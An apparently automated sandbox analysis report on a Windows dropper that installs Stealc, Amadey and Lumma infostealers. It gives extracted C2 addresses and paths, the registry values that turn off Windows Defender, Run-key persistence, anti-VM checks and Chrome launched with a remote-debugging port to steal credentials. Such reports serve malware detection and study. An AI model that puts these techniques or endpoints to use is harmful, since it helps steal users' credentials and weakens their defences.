Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-11-2024 18:56
Static task
static1
General
-
Target
80a06daf6ed8a048bdb8e984944b6dda.exe
-
Size
5.6MB
-
MD5
80a06daf6ed8a048bdb8e984944b6dda
-
SHA1
cb5607827f1cf72c7348da9cee31e0fe2f172798
-
SHA256
691c7ddc3e39d23fded313d5fd9e2f2e2a73e20358e674621675f1d0b5e27c90
-
SHA512
a44e709575bddbfca2a9be133ba3a3a436ce1f1375e1a42e4aeeafc9ad63ca8d1ba0bf11b4bb9cf0e119fb04401d1a50fc01f385184f503992cc5547e244b751
-
SSDEEP
98304:7cs0H4FuUhefPoROiItH1uPUvWlpu0hPyc9/Y3CroeUjsJJyRCMStCAnPEjKKTD1:QsHThKPok1uPNlpu0hTw3CkeqsJANStW
Malware Config
Extracted
stealc
tale
http://185.215.113.206
-
url_path
/6c4adf523b719729.php
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://founpiuer.store/api
https://navygenerayk.store/api
Signatures
-
Amadey family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 19c7e02c42.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 19c7e02c42.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 19c7e02c42.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 19c7e02c42.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 19c7e02c42.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 19c7e02c42.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2Q3467.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 99db4eccbd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 19c7e02c42.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3X95f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4p222w.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 067dcb623b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 205 6516 powershell.exe 206 6516 powershell.exe -
Downloads MZ/PE file
-
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools powershell.exe -
Uses browser remote debugging 2 TTPs 7 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4960 chrome.exe 3972 msedge.exe 3492 msedge.exe 632 msedge.exe 3432 chrome.exe 4288 chrome.exe 880 chrome.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2Q3467.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 99db4eccbd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 19c7e02c42.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2Q3467.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4p222w.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 067dcb623b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 99db4eccbd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 19c7e02c42.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3X95f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3X95f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4p222w.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 067dcb623b.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation 4p222w.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation chromedriver.exe -
Executes dropped EXE 12 IoCs
pid Process 2136 b0P62.exe 1404 2Q3467.exe 2632 3X95f.exe 3608 4p222w.exe 2044 skotes.exe 632 067dcb623b.exe 976 99db4eccbd.exe 924 a0b3eb8bf9.exe 4852 19c7e02c42.exe 6068 chromedriver.exe 6156 skotes.exe 2520 skotes.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 4p222w.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 99db4eccbd.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 2Q3467.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 3X95f.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 067dcb623b.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 19c7e02c42.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe -
Loads dropped DLL 1 IoCs
pid Process 2632 3X95f.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 19c7e02c42.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 19c7e02c42.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\19c7e02c42.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1003925001\\19c7e02c42.exe" skotes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 80a06daf6ed8a048bdb8e984944b6dda.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" b0P62.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\067dcb623b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1003922001\\067dcb623b.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\99db4eccbd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1003923001\\99db4eccbd.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a0b3eb8bf9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1003924001\\a0b3eb8bf9.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000023cec-242.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 1404 2Q3467.exe 2632 3X95f.exe 3608 4p222w.exe 2044 skotes.exe 632 067dcb623b.exe 976 99db4eccbd.exe 4852 19c7e02c42.exe 6156 skotes.exe 2520 skotes.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 4p222w.exe -
pid Process 6516 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1280 2632 WerFault.exe 94 -
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3X95f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 067dcb623b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 99db4eccbd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b0P62.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2Q3467.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4p222w.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a0b3eb8bf9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 80a06daf6ed8a048bdb8e984944b6dda.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 19c7e02c42.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chromedriver.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
Checks processor information in registry 2 TTPs 13 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3X95f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3X95f.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Kills process with taskkill 5 IoCs
pid Process 4780 taskkill.exe 1172 taskkill.exe 4072 taskkill.exe 4480 taskkill.exe 528 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133752201801833042" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings firefox.exe -
Suspicious behavior: EnumeratesProcesses 51 IoCs
pid Process 1404 2Q3467.exe 1404 2Q3467.exe 2632 3X95f.exe 2632 3X95f.exe 2632 3X95f.exe 2632 3X95f.exe 2632 3X95f.exe 2632 3X95f.exe 3432 chrome.exe 3432 chrome.exe 2632 3X95f.exe 2632 3X95f.exe 2632 3X95f.exe 2632 3X95f.exe 3892 msedge.exe 3892 msedge.exe 3972 msedge.exe 3972 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3860 msedge.exe 3608 4p222w.exe 3608 4p222w.exe 2044 skotes.exe 2044 skotes.exe 632 067dcb623b.exe 632 067dcb623b.exe 976 99db4eccbd.exe 976 99db4eccbd.exe 924 a0b3eb8bf9.exe 924 a0b3eb8bf9.exe 4852 19c7e02c42.exe 4852 19c7e02c42.exe 924 a0b3eb8bf9.exe 924 a0b3eb8bf9.exe 4852 19c7e02c42.exe 4852 19c7e02c42.exe 4852 19c7e02c42.exe 6156 skotes.exe 6156 skotes.exe 6516 powershell.exe 6516 powershell.exe 6516 powershell.exe 6516 powershell.exe 2520 skotes.exe 2520 skotes.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3972 msedge.exe 3972 msedge.exe -
Suspicious use of AdjustPrivilegeToken 28 IoCs
description pid Process Token: SeShutdownPrivilege 3432 chrome.exe Token: SeCreatePagefilePrivilege 3432 chrome.exe Token: SeShutdownPrivilege 3432 chrome.exe Token: SeCreatePagefilePrivilege 3432 chrome.exe Token: SeShutdownPrivilege 3432 chrome.exe Token: SeCreatePagefilePrivilege 3432 chrome.exe Token: SeShutdownPrivilege 3432 chrome.exe Token: SeCreatePagefilePrivilege 3432 chrome.exe Token: SeShutdownPrivilege 3432 chrome.exe Token: SeCreatePagefilePrivilege 3432 chrome.exe Token: SeShutdownPrivilege 3432 chrome.exe Token: SeCreatePagefilePrivilege 3432 chrome.exe Token: SeShutdownPrivilege 3432 chrome.exe Token: SeCreatePagefilePrivilege 3432 chrome.exe Token: SeShutdownPrivilege 3432 chrome.exe Token: SeCreatePagefilePrivilege 3432 chrome.exe Token: SeShutdownPrivilege 3432 chrome.exe Token: SeCreatePagefilePrivilege 3432 chrome.exe Token: SeDebugPrivilege 528 taskkill.exe Token: SeDebugPrivilege 4780 taskkill.exe Token: SeDebugPrivilege 1172 taskkill.exe Token: SeDebugPrivilege 4072 taskkill.exe Token: SeDebugPrivilege 4480 taskkill.exe Token: SeDebugPrivilege 624 firefox.exe Token: SeDebugPrivilege 624 firefox.exe Token: SeDebugPrivilege 4852 19c7e02c42.exe Token: SeDebugPrivilege 6068 chromedriver.exe Token: SeDebugPrivilege 6516 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3432 chrome.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3972 msedge.exe 3608 4p222w.exe 924 a0b3eb8bf9.exe 924 a0b3eb8bf9.exe 924 a0b3eb8bf9.exe 924 a0b3eb8bf9.exe 924 a0b3eb8bf9.exe 924 a0b3eb8bf9.exe 924 a0b3eb8bf9.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe -
Suspicious use of SendNotifyMessage 31 IoCs
pid Process 924 a0b3eb8bf9.exe 924 a0b3eb8bf9.exe 924 a0b3eb8bf9.exe 924 a0b3eb8bf9.exe 924 a0b3eb8bf9.exe 924 a0b3eb8bf9.exe 924 a0b3eb8bf9.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe 624 firefox.exe 924 a0b3eb8bf9.exe 924 a0b3eb8bf9.exe 924 a0b3eb8bf9.exe 924 a0b3eb8bf9.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 624 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4852 wrote to memory of 2136 4852 80a06daf6ed8a048bdb8e984944b6dda.exe 84 PID 4852 wrote to memory of 2136 4852 80a06daf6ed8a048bdb8e984944b6dda.exe 84 PID 4852 wrote to memory of 2136 4852 80a06daf6ed8a048bdb8e984944b6dda.exe 84 PID 2136 wrote to memory of 1404 2136 b0P62.exe 86 PID 2136 wrote to memory of 1404 2136 b0P62.exe 86 PID 2136 wrote to memory of 1404 2136 b0P62.exe 86 PID 2136 wrote to memory of 2632 2136 b0P62.exe 94 PID 2136 wrote to memory of 2632 2136 b0P62.exe 94 PID 2136 wrote to memory of 2632 2136 b0P62.exe 94 PID 2632 wrote to memory of 3432 2632 3X95f.exe 97 PID 2632 wrote to memory of 3432 2632 3X95f.exe 97 PID 3432 wrote to memory of 4620 3432 chrome.exe 98 PID 3432 wrote to memory of 4620 3432 chrome.exe 98 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 840 3432 chrome.exe 99 PID 3432 wrote to memory of 1180 3432 chrome.exe 100 PID 3432 wrote to memory of 1180 3432 chrome.exe 100 PID 3432 wrote to memory of 100 3432 chrome.exe 101 PID 3432 wrote to memory of 100 3432 chrome.exe 101 PID 3432 wrote to memory of 100 3432 chrome.exe 101 PID 3432 wrote to memory of 100 3432 chrome.exe 101 PID 3432 wrote to memory of 100 3432 chrome.exe 101 PID 3432 wrote to memory of 100 3432 chrome.exe 101 PID 3432 wrote to memory of 100 3432 chrome.exe 101 PID 3432 wrote to memory of 100 3432 chrome.exe 101 PID 3432 wrote to memory of 100 3432 chrome.exe 101 PID 3432 wrote to memory of 100 3432 chrome.exe 101 PID 3432 wrote to memory of 100 3432 chrome.exe 101 PID 3432 wrote to memory of 100 3432 chrome.exe 101 PID 3432 wrote to memory of 100 3432 chrome.exe 101 PID 3432 wrote to memory of 100 3432 chrome.exe 101 PID 3432 wrote to memory of 100 3432 chrome.exe 101 PID 3432 wrote to memory of 100 3432 chrome.exe 101 PID 3432 wrote to memory of 100 3432 chrome.exe 101 PID 3432 wrote to memory of 100 3432 chrome.exe 101 PID 3432 wrote to memory of 100 3432 chrome.exe 101 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\80a06daf6ed8a048bdb8e984944b6dda.exe"C:\Users\Admin\AppData\Local\Temp\80a06daf6ed8a048bdb8e984944b6dda.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\b0P62.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\b0P62.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2Q3467.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2Q3467.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1404
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3X95f.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3X95f.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffd9e6bcc40,0x7ffd9e6bcc4c,0x7ffd9e6bcc585⤵PID:4620
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1824,i,9747215450497580339,10125871448995702397,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1820 /prefetch:25⤵PID:840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2180,i,9747215450497580339,10125871448995702397,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2264 /prefetch:35⤵PID:1180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,9747215450497580339,10125871448995702397,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2292 /prefetch:85⤵PID:100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3220,i,9747215450497580339,10125871448995702397,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3240 /prefetch:15⤵
- Uses browser remote debugging
PID:4288
-
-
